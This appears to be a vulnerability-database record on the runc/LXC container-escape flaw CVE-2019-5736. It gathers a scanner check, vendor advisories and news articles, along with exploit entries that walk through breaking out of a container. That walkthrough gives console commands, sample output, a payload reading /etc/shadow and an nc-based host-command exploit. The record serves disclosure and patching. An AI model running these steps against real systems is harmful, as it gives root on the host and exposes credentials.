largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free 
Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876772\");\n script_version(\"2019-09-10T08:05:24+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-09-10 08:05:24 +0000 (Tue, 10 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-07 02:24:26 +0000 (Sat, 07 Sep 2019)\");\n script_name(\"Fedora Update for lxc FEDORA-2019-2baa1f7b19\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-2baa1f7b19\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/65IXLZTB6YNAXP3MTSPJSLOFVVRDMBF3\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lxc'\n package(s) announced via the FEDORA-2019-2baa1f7b19 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Linux Resource Containers provide process and 
resource isolation without the\noverhead of full virtualization.\");\n\n script_tag(name:\"affected\", value:\"'lxc' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"lxc\", rpm:\"lxc~3.0.4~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2019-02-14T11:30:04", "description": "", "published": "2019-02-13T00:00:00", "type": "exploitdb", "title": "runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-13T00:00:00", "id": "EDB-ID:46369", "href": "https://www.exploit-db.com/exploits/46369", "sourceData": "## CVE-2019-5736 ##\r\n\r\nThis is exploit code for CVE-2019-5736 (and it works for both runc and LXC).\r\nThe simplest way to use it is to copy the exploit code into an existing\r\ncontainer, and run `make.sh`. However, you could just as easily create a bad\r\nimage and run that.\r\n\r\n```console\r\n% docker run --rm --name pwnme -dit ubuntu:18.10 bash\r\npwnme\r\n% docker cp CVE-2019-5736.tar pwnme:/CVE-2019-5736.tar\r\n```\r\n\r\nWe need to install `gcc` to build the exploit, and `runc` because we need to\r\nhave the shared libraries that `runc` would use. We don't actually use the\r\n`runc` binary itself. 
For LXC, you would install `lxc` instead of `runc`.\r\n\r\n```console\r\n% docker attach pwnme\r\n# apt-get update && apt-get install -y gcc runc\r\n[ snip ]\r\n# tar xf CVE-2019-5736.tar\r\n# ./CVE-2019-5736/make.sh\r\n```\r\n\r\nAnd now, `/bin/bash` in the container will be able to **overwrite the host runc\r\nbinary**. Since this binary is often executed by `root`, this allows for\r\nroot-level code execution on the host.\r\n\r\n```\r\n% docker exec -it pwnme /bin/bash\r\n[+] bad_libseccomp.so booted.\r\n[+] opened ro /proc/self/exe <3>.\r\n[+] constructed fdpath </proc/self/fd/3>\r\n[+] bad_init is ready -- see </tmp/bad_init_log> for logs.\r\n[*] dying to allow /proc/self/exe to be unused...\r\n% cat /usr/sbin/docker-runc\r\n#!/bin/bash\r\ntouch /w00t_w00t ; cat /etc/shadow\r\n```\r\n\r\nAnd now if you try to use Docker normally, the malicious script will execute\r\nwith root privileges:\r\n\r\n```\r\n% docker exec -it pwnme /bin/good_bash\r\nOCI runtime state failed: invalid character 'b' looking for beginning of value: unknown\r\n% file /w00t_w00t\r\n/w00t_w00t: empty\r\n```\r\n\r\nAnd obviously `make.sh` can be modified to make the evil path anything you\r\nlike. 
If you want to get access to the container, use `/bin/good_bash`.\r\n\r\n### License ###\r\n\r\n```\r\nCopyright (C) 2019 Aleksa Sarai <cyphar@cyphar.com>\r\nVulnerability discovered by Adam Iwaniuk and Borys Pop\u0142awski.\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to\r\ndeal in the Software without restriction, including without limitation the\r\nrights to use, copy, modify, merge, publish, distribute, sublicense, and/or\r\nsell copies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions:\r\n\r\n* The above copyright notice and this permission notice shall be included in\r\n all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\r\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\r\nIN THE SOFTWARE.\r\n```\r\n\r\n\r\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46369.zip\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46369"}, {"lastseen": "2019-02-12T19:24:16", "description": "", "published": "2019-02-12T00:00:00", "type": "exploitdb", "title": "runc< 1.0-rc6 (Docker < 18.09.2) - Host Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-12T00:00:00", "id": "EDB-ID:46359", "href": "https://www.exploit-db.com/exploits/46359", "sourceData": "# Usage\r\nEdit HOST inside `payload.c`, compile with `make`. 
Start `nc` and run `pwn.sh` inside the container.\r\n\r\n# Notes\r\n- This exploit is destructive: it'll overwrite `/usr/bin/docker-runc` binary *on the host* with the\r\npayload. It'll also overwrite `/bin/sh` inside the container.\r\n- Tested only on Debian 9.\r\n- No attempts were made to make it stable or reliable, it's only tested to work when a `docker exec\r\n<id> /bin/sh` is issued on the host.\r\n\r\nMore complete explanation [here](https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d).\r\n\r\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46359.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46359"}], "zdt": [{"lastseen": "2019-02-25T07:57:31", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2019-02-15T00:00:00", "title": "runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-15T00:00:00", "id": "1337DAY-ID-32182", "href": "https://0day.today/exploit/description/32182", "sourceData": "runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)\r\n\r\n## CVE-2019-5736 ##\r\n\r\nThis is exploit code for CVE-2019-5736 (and it works for both runc and LXC).\r\nThe simplest way to use it is to copy the exploit code into an existing\r\ncontainer, and run `make.sh`. However, you could just as easily create a bad\r\nimage and run that.\r\n\r\n```console\r\n% docker run --rm --name pwnme -dit ubuntu:18.10 bash\r\npwnme\r\n% docker cp CVE-2019-5736.tar pwnme:/CVE-2019-5736.tar\r\n```\r\n\r\nWe need to install `gcc` to build the exploit, and `runc` because we need to\r\nhave the shared libraries that `runc` would use. We don't actually use the\r\n`runc` binary itself. 
For LXC, you would install `lxc` instead of `runc`.\r\n\r\n```console\r\n% docker attach pwnme\r\n# apt-get update && apt-get install -y gcc runc\r\n[ snip ]\r\n# tar xf CVE-2019-5736.tar\r\n# ./CVE-2019-5736/make.sh\r\n```\r\n\r\nAnd now, `/bin/bash` in the container will be able to **overwrite the host runc\r\nbinary**. Since this binary is often executed by `root`, this allows for\r\nroot-level code execution on the host.\r\n\r\n```\r\n% docker exec -it pwnme /bin/bash\r\n[+] bad_libseccomp.so booted.\r\n[+] opened ro /proc/self/exe <3>.\r\n[+] constructed fdpath </proc/self/fd/3>\r\n[+] bad_init is ready -- see </tmp/bad_init_log> for logs.\r\n[*] dying to allow /proc/self/exe to be unused...\r\n% cat /usr/sbin/docker-runc\r\n#!/bin/bash\r\ntouch /w00t_w00t ; cat /etc/shadow\r\n```\r\n\r\nAnd now if you try to use Docker normally, the malicious script will execute\r\nwith root privileges:\r\n\r\n```\r\n% docker exec -it pwnme /bin/good_bash\r\nOCI runtime state failed: invalid character 'b' looking for beginning of value: unknown\r\n% file /w00t_w00t\r\n/w00t_w00t: empty\r\n```\r\n\r\nAnd obviously `make.sh` can be modified to make the evil path anything you\r\nlike. 
If you want to get access to the container, use `/bin/good_bash`.\r\n\r\n### License ###\r\n\r\n```\r\nCopyright (C) 2019 Aleksa Sarai <cyphar@cyphar.com>\r\nVulnerability discovered by Adam Iwaniuk and Borys Pop\u0142awski.\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to\r\ndeal in the Software without restriction, including without limitation the\r\nrights to use, copy, modify, merge, publish, distribute, sublicense, and/or\r\nsell copies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions:\r\n\r\n* The above copyright notice and this permission notice shall be included in\r\n all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\r\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\r\nIN THE SOFTWARE.\r\n```\r\n\r\n\r\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46369.zip\r\n\n\n# 0day.today [2019-02-25] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/32182"}, {"lastseen": "2019-02-25T08:13:22", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2019-02-12T00:00:00", "title": "runC < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-12T00:00:00", "id": "1337DAY-ID-32165", "href": "https://0day.today/exploit/description/32165", "sourceData": "runc< 1.0-rc6 (Docker < 18.09.2) - Host Command Execution\r\n\r\n# Usage\r\nEdit HOST inside `payload.c`, compile with `make`. Start `nc` and run `pwn.sh` inside the container.\r\n\r\n# Notes\r\n- This exploit is destructive: it'll overwrite `/usr/bin/docker-runc` binary *on the host* with the\r\npayload. 
It'll also overwrite `/bin/sh` inside the container.\r\n- Tested only on Debian 9.\r\n- No attempts were made to make it stable or reliable, it's only tested to work when a `docker exec\r\n<id> /bin/sh` is issued on the host.\r\n\r\nMore complete explanation [here](https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d).\r\n\r\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46359.zip\r\n\n\n# 0day.today [2019-02-25] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/32165"}], "cisco": [{"lastseen": "2019-05-29T15:32:02", "bulletinFamily": "software", "cvelist": ["CVE-2019-5736"], "description": "A vulnerability in the Open Container Initiative runc CLI tool used by multiple products could allow an unauthenticated, remote attacker to escalate privileges on a targeted system.\n\nThe vulnerability exists because the affected software improperly handles file descriptors related to /proc/self/exe. An attacker could exploit the vulnerability either by persuading a user to create a new container using an attacker-controlled image or by using the docker exec command to attach into an existing container that the attacker already has write access to. 
A successful exploit could allow the attacker to overwrite the host's runc binary file with a malicious file, escape the container, and execute arbitrary commands with root privileges on the host system.\n\nThis advisory will be updated as additional information becomes available.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190215-runc [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190215-runc\"]", "modified": "2019-03-15T19:59:44", "published": "2019-02-15T17:00:00", "id": "CISCO-SA-20190215-RUNC", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190215-runc", "type": "cisco", "title": "Container Privilege Escalation Vulnerability Affecting Cisco Products: February 2019", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2019-02-12T09:21:48", "bulletinFamily": "info", "cvelist": ["CVE-2019-5736"], "description": "[](<https://1.bp.blogspot.com/-yPiZVO6M3og/XGKIqsgUb0I/AAAAAAAAzSY/gp4PJJU3-RA1YsD8NrTgc9r1AtbFt8ANQCLcBGAs/s728-e100/linux-container-runc-docker-hack.png>)\n\nA serious security vulnerability has been discovered in the core **runC** container code that affects several open-source container management systems, potentially allowing attackers to escape Linux containers and obtain unauthorized, root-level access to the host operating system. \n \nThe vulnerability, identified as [CVE-2019-5736](<https://nvd.nist.gov/vuln/detail/CVE-2019-5736>), was discovered by open source security researchers Adam Iwaniuk and Borys Pop\u0142awski and publicly [disclosed](<https://www.openwall.com/lists/oss-security/2019/02/11/2>) by Aleksa Sarai, a senior software engineer and runC maintainer at SUSE Linux GmbH on Monday. 
\n \nThe flaw resides in runC\u2014a lightweight low-level command-line tool for spawning and running containers, an operating-system-level virtualization method for running multiple isolated systems on a host using a single kernel. \n\n\n \nOriginally created by Docker, runC is the default container run-time for Docker, Kubernetes, ContainerD, CRI-O, and other container-dependent programs, and is widely being used by major cloud hosting and server providers. \n \n\n\n### runC Container Escape Vulnerability [CVE-2019-5736]\n\n \nThough researchers have not yet released full technical details of the flaw to give people time to patch, the Red Hat [advisory](<https://access.redhat.com/security/cve/cve-2019-5736>) says the \"flaw was found in the way runC handled system file descriptors when running containers.\" \n \nThus, a specially-crafted malicious container or an attacker having root access to a container could exploit this flaw (with minimal user interaction) to gain administrative privileges on the host machine running the container, eventually compromising the hundreds-to-thousands of other containers running on it. \n \nFor root access to the container, the attacker has to either: \n\n\n * create a new container using an attacker-controlled image, or\n * attach (docker exec) into an existing container which the attacker had previous write access to.\n\"A malicious container [then] could use this flaw to overwrite contents of the runC binary and consequently run arbitrary commands on the container host system,\" the advisory states. 
\n \n**How bad is this vulnerability?** \n \nScott McCarty, principal product manager for containers at Red Hat, [says](<https://www.redhat.com/en/blog/it-starts-linux-how-red-hat-helping-counter-linux-container-security-flaws>), \"While there are very few incidents that could qualify as a doomsday scenario for enterprise IT, a cascading set of exploits affecting a wide range of interconnected production systems qualifies...and that\u2019s exactly what this vulnerability represents.\" \n \n\n\n### runC Flaw: Security Patch Updates and Mitigation\n\n \nAccording to Red Hat, the vulnerability can be mitigated if SELinux in targeted enforcing mode is enabled, which is the default on Red Hat Enterprise Linux, CentOS, and Fedora. \n\n\n \nThe maintainers of runC have published a [git commit](<https://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b>) to resolve the security flaw, but all the projects built atop runC need to incorporate the patches in their products. \n \n[Debian](<https://security-tracker.debian.org/tracker/CVE-2019-5736>) and [Ubuntu](<https://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-5736.html>) have also acknowledged that their Linux distributions are vulnerable to the reported vulnerability. The issue also affects container systems using [LXC](<https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d>), a Linux containerization tool that predates Docker, and [Apache Mesos](<https://mesos.apache.org/>) container code. \n \nMajor vendors and cloud service providers have already been pushing out security patches to address the issue, including [Google](<https://cloud.google.com/kubernetes-engine/docs/security-bulletins#february-11-2019-runc>), [Amazon](<https://aws.amazon.com/security/security-bulletins/AWS-2019-002/>), [Docker](<https://docs.docker.com/engine/release-notes/>), and [Kubernetes](<https://kubernetes.io/blog/2019/02/11/runc-and-cve-2019-5736/>). 
\n \nRancher, the creator of the open-source Kubernetes management software, has also published a [patching script](<https://github.com/rancher/runc-cve>) for legacy versions of Docker. \n \nIf you are running any kind of containers, consider yourself vulnerable and upgrade to an image with a fixed version of runC as soon as it is available to prevent cyber attacks.\n", "modified": "2019-02-12T09:17:09", "published": "2019-02-12T08:59:00", "id": "THN:B0FC327500C590C565FC4F46D8DCDD34", "href": "https://thehackernews.com/2019/02/linux-container-runc-docker.html", "type": "thn", "title": "RunC Flaw Lets Attackers Escape Linux Containers to Gain Root on Hosts", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2019-08-13T18:46:26", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n \n* A flaw was found in the way runc handled system file descriptors when running containers. A malicious container could use this flaw to overwrite contents of the runc binary and consequently run arbitrary commands on the container host system. 
(CVE-2019-5736)\n\nAll OpenShift Container Platform 3 users are advised to upgrade to these updated packages.\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-02-26T14:32:43", "published": "2019-02-26T14:31:21", "id": "RHSA-2019:0408", "href": "https://access.redhat.com/errata/RHSA-2019:0408", "type": "redhat", "title": "(RHSA-2019:0408) Important: OpenShift Container Platform 3.4, 3.5, 3.6, and 3.7 security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:22", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Docker is an open-source engine that automates the deployment of any application as a lightweight, portable, self-sufficient container that runs virtually anywhere.\n\nSecurity Fix(es):\n\n* A flaw was found in the way runc handled system file descriptors when running containers. A malicious container could use this flaw to overwrite contents of the runc binary and consequently run arbitrary commands on the container host system. 
(CVE-2019-5736)\n\nAdditional details about this flaw, including mitigation information, can be found in the vulnerability article linked from the Reference section.\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-02-11T19:28:04", "published": "2019-02-11T19:26:20", "id": "RHSA-2019:0304", "href": "https://access.redhat.com/errata/RHSA-2019:0304", "type": "redhat", "title": "(RHSA-2019:0304) Important: docker security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-10T10:21:06", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "The container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc.\n\nSecurity Fix(es):\n\n* A flaw was found in the way runc handled system file descriptors when running containers. A malicious container could use this flaw to overwrite contents of the runc binary and consequently run arbitrary commands on the container host system. 
(CVE-2019-5736)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* [stream rhel8] rebase container-selinux to 2.94 (BZ#1693675)\n\n* [stream rhel8] unable to mount disk at `/var/lib/containers` via `systemd` unit when `container-selinux` policy installed (BZ#1695669)\n\n* [stream rhel8] don't allow a container to connect to random services (BZ#1695689)", "modified": "2019-05-07T08:05:58", "published": "2019-05-07T07:39:11", "id": "RHSA-2019:0975", "href": "https://access.redhat.com/errata/RHSA-2019:0975", "type": "redhat", "title": "(RHSA-2019:0975) Important: container-tools:rhel8 security and bug fix update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:34:06", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Red Hat Container Development Kit is a platform for developing containerized applications; a set of tools that enables developers to quickly and easily set up an environment for developing and testing containerized applications on the Red Hat Enterprise Linux platform.\n\nThis update, Container Development Kit 3.7.0-1, includes an updated Red Hat Enterprise Linux ISO that contains fixes for the following security issues.\n\nSecurity Fix(es):\n\n* runc: Execution of malicious containers allows for container escape and access to host filesystem (CVE-2019-5736)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-02-26T03:38:34", "published": "2019-02-26T03:38:15", "id": "RHSA-2019:0401", "href": "https://access.redhat.com/errata/RHSA-2019:0401", "type": "redhat", "title": "(RHSA-2019:0401) Important: Container Development Kit 3.7.0-1 security update", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:37", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "The runC tool is a lightweight, portable implementation of the Open Container Format (OCF) that provides container runtime.\n\nSecurity Fix(es):\n\n* A flaw was found in the way runc handled system file descriptors when running containers. A malicious container could use this flaw to overwrite contents of the runc binary and consequently run arbitrary commands on the container host system. (CVE-2019-5736)\n\nAdditional details about this flaw, including mitigation information, can be found in the vulnerability article linked from the Reference section.\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-02-11T19:27:28", "published": "2019-02-11T19:24:53", "id": "RHSA-2019:0303", "href": "https://access.redhat.com/errata/RHSA-2019:0303", "type": "redhat", "title": "(RHSA-2019:0303) Important: runc security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2019-11-06T16:05:18", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "\n", "edition": 6, "modified": "2019-02-22T00:00:00", "published": "2019-02-15T00:00:00", "id": "VMSA-2019-0001", "href": "https://www.vmware.com/security/advisories/VMSA-2019-0001.html", "title": "VMware product updates resolve mishandled file descriptor vulnerability in runc container runtime.", "type": "vmware", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "virtuozzo": [{"lastseen": "2019-11-05T11:28:07", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with a security fix. 
The patch applies to all supported Virtuozzo kernels and that of Virtuozzo Infrastructure Platform 2.5.\n**Vulnerability id:** PSBM-91042\nIt was discovered that a malicious user logged in to a Virtuozzo container could potentially overwrite the 'vzctl' binary on the host. The attacker could replace executables in that container with symlinks to '/proc/self/exe'. After that, 'vzctl exec' called from the host to run one of such executables would try to run the host's 'vzctl' there instead. If the attacker managed to intercept that, they would be able to change the contents of the host's 'vzctl' binary. The issue is similar to CVE-2019-5736, but affects 'vzctl' rather than 'runc'.\n\n", "edition": 1, "modified": "2019-02-12T00:00:00", "published": "2019-02-12T00:00:00", "id": "VZA-2019-008", "href": "https://help.virtuozzo.com/s/article/VZA-2019-008", "title": "Important kernel security update: Virtuozzo ReadyKernel patch 72.0 for all supported Virtuozzo kernels and that of Virtuozzo Infrastructure Platform 2.5", "type": "virtuozzo", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2019-02-20T09:45:54", "bulletinFamily": "blog", "cvelist": ["CVE-2019-5736"], "description": "Despite the huge advantages that containers offer in application portability, acceleration of CI/CD pipelines and agility of deployment environments, the biggest concern has always been about isolation. Since all the containers running on a host share the same underlying kernel, any malicious code breaking out of a container can compromise the entire host, and hence all the applications running on the host and potentially in the cluster.\n\nThat fear of container isolation failing to hold up turned out to be true yesterday when a vulnerability in runC was announced. runC is the key and most popular software component that most container engines rely on for spinning up containers on a host. 
The announced vulnerability allows an attacker to break out of the container isolation through a well-crafted attack (technical details of the vulnerability and the exploit are at _<https://seclists.org/oss-sec/2019/q1/119>_) and compromise the entire host. The vulnerability is particularly nasty because it is not covered by the default AppArmor or SELinux kernel-enforced sandboxing policies.\n\n### What can you do to protect your containerized applications?\n\nEven though the exploit is tricky to execute, the exploit code will be released publicly on **February 18**, so it\u2019s best to protect your container environment by doing the following:\n\n 1. Know on which nodes (Docker hosts) you are running containers, and whether any of them is running a vulnerable version of Docker Engine. If you are a Qualys customer, you can use AssetView to get that information. Docker has released the patch in version 18.09.2. \n\n\n 2. Upgrade your Docker hosts to version 18.09.2.\n 3. For hosts managed by public cloud service providers, please keep a close watch on how they are addressing the issue. \nGCP - <https://cloud.google.com/kubernetes-engine/docs/security-bulletins> \nAWS - <https://aws.amazon.com/security/security-bulletins/AWS-2019-002/>\n 4. Qualys is working on releasing the following detections (QIDs), and more vendor-specific QIDs will be launched in the coming days. 
\n\n** 237121 **: Red Hat Update for docker (RHSA-2019:0304) \n** 237120 **: Red Hat Update for runc (RHSA-2019:0303) \n** 351500 **: Amazon Linux Security Advisory for docker: ALAS-2019-1156 \n** 371641 **: Runc Container Breakout Vulnerability\n\nYou can get more details at [Qualys Threat Protection](<https://threatprotect.qualys.com/2019/02/11/runc-container-escape-vulnerability-cve-2019-5736/>).\n\n### What to do in the future?\n\nIt\u2019s good to be concerned about any new technology while it matures, but it\u2019s equally important to harden the application build and deployment workflows in order to prevent the attacker from getting an easy lead into exploiting the deployed containers.\n\n 1. Ensure that only those container images that have gone through the defined compliance checks (related to vulnerabilities, packages, etc.) are deployed in production. As an example, you can use the Qualys Container Security solution to promote only those built images that pass the compliance checks on the build nodes. \n\n\n 2. Privileged containers, if compromised, can bring down the entire container cluster. Hence, keep a close watch on all privileged containers running in your environment. 
\n\n\n\n(Asif Awan is CTO for Container Security at Qualys)", "modified": "2019-02-12T15:46:10", "published": "2019-02-12T15:46:10", "id": "QUALYSBLOG:1ECEF05BCE67BDE50D7D24223957B465", "href": "https://blog.qualys.com/securitylabs/2019/02/12/runc-container-breakout-vulnerability", "type": "qualysblog", "title": "RunC Container Breakout Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:40", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Arch Linux Security Advisory ASA-201902-6\n=========================================\n\nSeverity: High\nDate : 2019-02-11\nCVE-ID : CVE-2019-5736\nPackage : runc\nType : privilege escalation\nRemote : Yes\nLink : https://security.archlinux.org/AVG-878\n\nSummary\n=======\n\nThe package runc before version 1.0.0rc6-1 is vulnerable to privilege\nescalation.\n\nResolution\n==========\n\nUpgrade to 1.0.0rc6-1.\n\n# pacman -Syu \"runc>=1.0.0rc6-1\"\n\nThe problem has been fixed upstream in version 1.0.0rc6.\n\nWorkaround\n==========\n\nDon't run privileged containers.\n\nDescription\n===========\n\nA vulnerability discovered in runc through 1.0-rc6, as used in Docker\nbefore 18.09.2 and other products, allows attackers to overwrite the\nhost runc binary (and consequently obtain host root access) by\nleveraging the ability to execute a command as root within one of these\ntypes of containers: (1) a new container with an attacker-controlled\nimage, or (2) an existing container, to which the attacker previously\nhad write access, that can be attached with docker exec. 
